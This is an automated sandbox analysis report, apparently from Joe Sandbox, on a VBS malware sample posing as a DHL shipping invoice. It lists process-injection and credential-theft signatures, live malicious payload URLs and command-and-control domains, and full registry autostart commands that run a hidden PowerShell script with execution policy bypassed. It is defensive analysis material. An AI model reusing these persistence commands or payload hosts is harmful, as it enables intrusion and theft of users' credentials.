conhost.exe 20->44         started        122 Writes to foreign memory regions 23->122 124 Injects a PE file into a foreign processes 23->124 46 conhost.exe 23->46         started        48 AddInProcess32.exe 23->48         started        50 AddInProcess32.exe 23->50         started        52 conhost.exe 27->52         started        54 AddInProcess32.exe 27->54         started        56 2 other processes 31->56 58 2 other processes 33->58 process8 dnsIp9 100 desckvbrat.com.br 191.252.83.213, 21, 49730, 49731 LocawebServicosdeInternetSABR Brazil 39->100 102 b2case.com 188.114.96.3, 443, 49732, 49734 CLOUDFLARENETUS European Union 39->102 88 C:\Users\user\AppData\Roaming\...\qkbrq.ps1, Unicode 39->88 dropped 136 Self deletion via cmd or bat file 39->136 138 Adds a directory exclusion to Windows Defender 39->138 60 powershell.exe 39->60         started        64 powershell.exe 1 11 39->64         started        66 powershell.exe 1 11 39->66         started        68 4 other processes 39->68 file10 signatures11 process12 dnsIp13 104 pastebin.com 104.20.4.235, 443, 49744, 49746 CLOUDFLARENETUS United States 60->104 148 Writes to foreign memory regions 60->148 150 Injects a PE file into a foreign processes 60->150 70 AddInProcess32.exe 60->70         started        152 Creates autostart registry keys with suspicious values (likely registry only malware) 64->152 154 Creates multiple autostart registry keys 64->154 156 Suspicious powershell command line found 68->156 158 Wscript starts Powershell (via cmd or directly) 68->158 160 Loading BitLocker PowerShell Module 68->160 75 WmiPrvSE.exe 68->75         started        signatures14 process15 dnsIp16 96 iwarsut775laudrye001.duckdns.org 43.226.229.232, 49745, 49747, 57484 SOFTLAYERUS Hong Kong 70->96 98 geoplugin.net 178.237.33.50, 49748, 80 ATOM86-ASATOM86NL Netherlands 70->98 86 C:\Users\user\AppData\Roaming\kanspt.dat, data 70->86 dropped 128 Contains functionality to bypass UAC (CMSTPLUA) 70->128 130 Tries to steal Mail credentials (via file registry) 70->130 132 Contains functionalty to change the wallpaper 70->132 134 6 other signatures 70->134 77 AddInProcess32.exe 70->77         started        80 AddInProcess32.exe 70->80         started        82 AddInProcess32.exe 70->82         started        84 AddInProcess32.exe 70->84         started        file17 signatures18 process19 signatures20 162 Tries to steal Instant Messenger accounts or passwords 77->162 164 Tries to steal Mail credentials (via file / registry access) 77->164 166 Tries to harvest and steal browser information (history, passwords, etc) 80->166

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    DHLShippingInvoicesAwbBL000000000102220242247.vbs0%ReversingLabs

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    SourceDetectionScannerLabelLink
                    paste.ee1%VirustotalBrowse
                    geoplugin.net0%VirustotalBrowse
                    desckvbrat.com.br7%VirustotalBrowse
                    b2case.com0%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    https://contoso.com/License0%URL Reputationsafe
                    https://aka.ms/pscore60%URL Reputationsafe
                    http://geoplugin.net/json.gp/C0%URL Reputationsafe
                    https://contoso.com/0%URL Reputationsafe
                    https://nuget.org/nuget.exe0%URL Reputationsafe
                    https://oneget.orgX0%URL Reputationsafe
                    https://login.yahoo.com/config/login0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    http://nuget.org/NuGet.exe0%URL Reputationsafe
                    http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                    http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                    https://go.micro0%URL Reputationsafe
                    http://www.imvu.com0%URL Reputationsafe
                    https://contoso.com/Icon0%URL Reputationsafe
                    http://geoplugin.net/json.gp0%URL Reputationsafe
                    http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                    https://aka.ms/pscore680%URL Reputationsafe
                    https://oneget.org0%URL Reputationsafe
                    http://www.ebuddy.com0%URL Reputationsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    paste.ee
                    		188.114.96.3
                    		truetrueunknown
                    geoplugin.net
                    		178.237.33.50
                    		truefalseunknown
                    desckvbrat.com.br
                    		191.252.83.213
                    		truetrueunknown
                    b2case.com
                    		188.114.96.3
                    		truetrueunknown
                    pastebin.com
                    		104.20.4.235
                    		truetrue
                      		unknown
                      iwarsut775laudrye001.duckdns.org
                      		43.226.229.232
                      		truetrue
                        		unknown
                        ftp.desckvbrat.com.br
                        		unknown
                        		unknowntrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://paste.ee/d/d80GV/0true
                            		unknown
                            hjnourt38haoust1.duckdns.orgtrue
                              		unknown
                              https://pastebin.com/raw/pQQ0n3eAfalse
                                		unknown
                                iwarsut775laudrye3.duckdns.orgtrue
                                  		unknown
                                  iwarsut775laudrye001.duckdns.orgtrue
                                    		unknown
                                    https://b2case.com/class.txttrue
                                      		unknown
                                      https://paste.ee/d/r322U/0true
                                        		unknown
                                        http://geoplugin.net/json.gpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://paste.ee/d/jm8qu/0true
                                          		unknown

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          http://ftp.desckvbrat.com.brpowershell.exe, 00000003.00000002.1919143366.000002203D80B000.00000004.00000800.00020000.00000000.sdmptrue
                                            		unknown
                                            http://desckvbrat.com.brpowershell.exe, 00000003.00000002.1919143366.000002203D80B000.00000004.00000800.00020000.00000000.sdmptrue
                                              		unknown
                                              http://www.microsoft.copowershell.exe, 00000008.00000002.2115107372.000002D4EB8D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://contoso.com/Licensepowershell.exe, 00000008.00000002.1779641476.000002D4D4DC6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://b2case.compowershell.exe, 00000003.00000002.1919143366.000002203C6B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://analytics.paste.eepowershell.exe, 00000003.00000002.1919143366.000002203C510000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C4F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D88E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203DBEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C729000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://paste.eepowershell.exe, 00000003.00000002.1919143366.000002203C323000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D835000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://aka.ms/pscore6powershell.exe, 00000001.00000002.3078580117.0000015B8005F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://www.google.compowershell.exe, 00000003.00000002.1919143366.000002203C510000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C4F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D88E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203DBEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C729000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exefalse
                                                        		unknown
                                                        http://geoplugin.net/json.gp/Cpowershell.exe, 0000000D.00000002.2290132644.000001AB99541000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2290132644.000001AB99151000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://contoso.com/powershell.exe, 00000008.00000002.1779641476.000002D4D4DC6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.1919143366.000002203DC0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2943623698.000002204C172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2409816379.0000015C9A3F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2311218245.000002804C253000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1778802424.0000018ACDCA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1930444646.0000018ADC42F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1930444646.0000018ADC566000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2013682859.000002D4E3686000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2013682859.000002D4E3550000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1779641476.000002D4D4DC6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://paste.ee/d/jm8qu/08powershell.exe, 00000003.00000002.1919143366.000002203C323000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D835000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://oneget.orgXpowershell.exe, 00000007.00000002.1778802424.0000018ACD883000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1779641476.000002D4D49A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://login.yahoo.com/config/loginAddInProcess32.exefalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://cdnjs.cloudflare.compowershell.exe, 00000003.00000002.1919143366.000002203C510000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C4F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D88E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203DBEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C729000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://cdnjs.cloudflare.com;powershell.exe, 00000003.00000002.1919143366.000002203C510000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C4F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D88E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203DBEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C729000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              http://www.nirsoft.net/AddInProcess32.exefalse
                                                                		unknown
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.3078580117.0000015B800B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1789063987.0000015C8A381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1787528120.000002803C1E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1778802424.0000018ACC3B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1779641476.000002D4D34D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://secure.gravatar.compowershell.exe, 00000003.00000002.1919143366.000002203C510000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C4F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D88E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203DBEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C729000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.1919143366.000002203DC0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2943623698.000002204C172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2409816379.0000015C9A3F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2311218245.000002804C253000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1778802424.0000018ACDCA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1930444646.0000018ADC42F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1930444646.0000018ADC566000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2013682859.000002D4E3686000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2013682859.000002D4E3550000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1779641476.000002D4D4DC6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000007.00000002.1778802424.0000018ACD883000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1779641476.000002D4D49A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://paste.ee/d/jm8qu/0Ppowershell.exe, 00000003.00000002.1919143366.000002203D835000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.1779641476.000002D4D4D6B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://paste.eepowershell.exe, 00000003.00000002.1919143366.000002203C724000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D861000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000004.00000002.1789063987.0000015C8A5A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1787528120.000002803C402000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.1779641476.000002D4D4D6B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://go.micropowershell.exe, 00000003.00000002.1919143366.000002203D14E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://www.google.com;powershell.exe, 00000003.00000002.1919143366.000002203C510000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C508000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C4F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D88E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203DBEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C729000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            http://www.imvu.comAddInProcess32.exefalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://contoso.com/Iconpowershell.exe, 00000008.00000002.1779641476.000002D4D4DC6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.1779641476.000002D4D4D6B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              http://b2case.compowershell.exe, 00000003.00000002.1919143366.000002203C6BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                http://geoplugin.net/AddInProcess32.exe, 00000015.00000002.3074510288.0000000000F18000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000004.00000002.1789063987.0000015C8A5A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1787528120.000002803C402000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://analytics.paste.ee;powershell.exe, 00000003.00000002.1919143366.000002203C510000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C4F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D88E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203DBEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C729000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    https://www.google.com/accounts/serviceloginAddInProcess32.exefalse
                                                                                      		unknown
                                                                                      https://aka.ms/pscore68powershell.exe, 00000001.00000002.3078580117.0000015B8007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1789063987.0000015C8A381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1787528120.000002803C1E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1778802424.0000018ACC3B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1779641476.000002D4D34D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://paste.ee/d/d80GV/0Ppowershell.exe, 00000003.00000002.1919143366.000002203DB93000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        http://pastebin.compowershell.exe, 0000000D.00000002.1948758053.000001AB895D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          https://pastebin.compowershell.exe, 0000000D.00000002.1948758053.000001AB893C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            https://themes.googleusercontent.compowershell.exe, 00000003.00000002.1919143366.000002203C510000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C508000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C4F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D88E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203DBEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C729000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              https://oneget.orgpowershell.exe, 00000007.00000002.1778802424.0000018ACD883000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1779641476.000002D4D49A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              http://crl.microspowershell.exe, 00000005.00000002.2605240365.0000028054873000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                http://www.ebuddy.comAddInProcess32.exefalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown

                                                                                                World Map of Contacted IPs

                                                                                                • No. of IPs < 25%
                                                                                                • 25% < No. of IPs < 50%
                                                                                                • 50% < No. of IPs < 75%
                                                                                                • 75% < No. of IPs

                                                                                                Public IPs

                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                104.20.4.235
                                                                                                		pastebin.comUnited States
                                                                                                		13335CLOUDFLARENETUStrue
                                                                                                188.114.96.3
                                                                                                		paste.eeEuropean Union
                                                                                                		13335CLOUDFLARENETUStrue
                                                                                                43.226.229.232
                                                                                                		iwarsut775laudrye001.duckdns.orgHong Kong
                                                                                                		36351SOFTLAYERUStrue
                                                                                                178.237.33.50
                                                                                                		geoplugin.netNetherlands
                                                                                                		8455ATOM86-ASATOM86NLfalse
                                                                                                191.252.83.213
                                                                                                		desckvbrat.com.brBrazil
                                                                                                		27715LocawebServicosdeInternetSABRtrue

                                                                                                General Information

                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                Analysis ID:1539088
                                                                                                Start date and time:2024-10-22 06:16:09 +02:00
                                                                                                Joe Sandbox product:CloudBasic
                                                                                                Overall analysis duration:0h 10m 39s
                                                                                                Hypervisor based Inspection enabled:false
                                                                                                Report type:full
                                                                                                Cookbook file name:default.jbs
                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                Number of analysed new started processes analysed:44
                                                                                                Number of new started drivers analysed:0
                                                                                                Number of existing processes analysed:0
                                                                                                Number of existing drivers analysed:0
                                                                                                Number of injected processes analysed:0
                                                                                                Technologies:
                                                                                                • HCA enabled
                                                                                                • EGA enabled
                                                                                                • AMSI enabled
                                                                                                Analysis Mode:default
                                                                                                Analysis stop reason:Timeout
                                                                                                Sample name:DHLShippingInvoicesAwbBL000000000102220242247.vbs
                                                                                                Detection:MAL
                                                                                                Classification:mal100.rans.spre.phis.troj.spyw.expl.evad.winVBS@61/45@6/5
                                                                                                EGA Information:
                                                                                                • Successful, ratio: 53.8%
                                                                                                HCA Information:
                                                                                                • Successful, ratio: 98%
                                                                                                • Number of executed functions: 163
                                                                                                • Number of non-executed functions: 328
                                                                                                Cookbook Comments:
                                                                                                • Found application associated with file extension: .vbs

                                                                                                Warnings

                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, consent.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                • Execution Graph export aborted for target powershell.exe, PID 1800 because it is empty
                                                                                                • Execution Graph export aborted for target powershell.exe, PID 1928 because it is empty
                                                                                                • Execution Graph export aborted for target powershell.exe, PID 6908 because it is empty
                                                                                                • Execution Graph export aborted for target powershell.exe, PID 7084 because it is empty
                                                                                                • Execution Graph export aborted for target powershell.exe, PID 7340 because it is empty
                                                                                                • Execution Graph export aborted for target powershell.exe, PID 7372 because it is empty
                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                Simulations

                                                                                                Behavior and APIs

                                                                                                TimeTypeDescription
                                                                                                00:17:01API Interceptor143x Sleep call for process: powershell.exe modified
                                                                                                00:17:58API Interceptor1213474x Sleep call for process: AddInProcess32.exe modified
                                                                                                05:17:15AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Update Drivers NVIDEO_fdm cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                                                                                                05:17:23AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Update Drivers NVIDEO_zhs cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                                                                                                05:17:31AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Update Drivers NVIDEO_fdm cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                                                                                                05:17:41AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Update Drivers NVIDEO_zhs cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit

                                                                                                Joe Sandbox View / Context

                                                                                                IPs

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                104.20.4.235gabe.ps1Get hashmaliciousUnknownBrowse
                                                                                                • pastebin.com/raw/sA04Mwk2
                                                                                                cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                                                • pastebin.com/raw/sA04Mwk2
                                                                                                vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                                                                • pastebin.com/raw/sA04Mwk2
                                                                                                OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                                                • pastebin.com/raw/sA04Mwk2
                                                                                                gaber.ps1Get hashmaliciousUnknownBrowse
                                                                                                • pastebin.com/raw/sA04Mwk2
                                                                                                cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                                                • pastebin.com/raw/sA04Mwk2
                                                                                                sostener.vbsGet hashmaliciousNjratBrowse
                                                                                                • pastebin.com/raw/V9y5Q5vv
                                                                                                sostener.vbsGet hashmaliciousXWormBrowse
                                                                                                • pastebin.com/raw/V9y5Q5vv
                                                                                                envifa.vbsGet hashmaliciousRemcosBrowse
                                                                                                • pastebin.com/raw/V9y5Q5vv
                                                                                                New Voicemail Invoice 64746w .jsGet hashmaliciousWSHRATBrowse
                                                                                                • pastebin.com/raw/NsQ5qTHr
                                                                                                188.114.96.3BL.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.launchdreamidea.xyz/bd77/
                                                                                                w49A5FG3yg.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                • 733812cm.n9shteam.in/DefaultWordpress.php
                                                                                                9XHFe6y4Dj.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                • 733812cm.n9shteam.in/DefaultWordpress.php
                                                                                                SecuriteInfo.com.Win32.MalwareX-gen.14607.6011.exeGet hashmaliciousUnknownBrowse
                                                                                                • servicetelemetryserver.shop/api/index.php
                                                                                                t1zTzS9a3r.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                • abdulbek.top/externalvideoprotectdefaultsqlWindowsdlePrivate.php
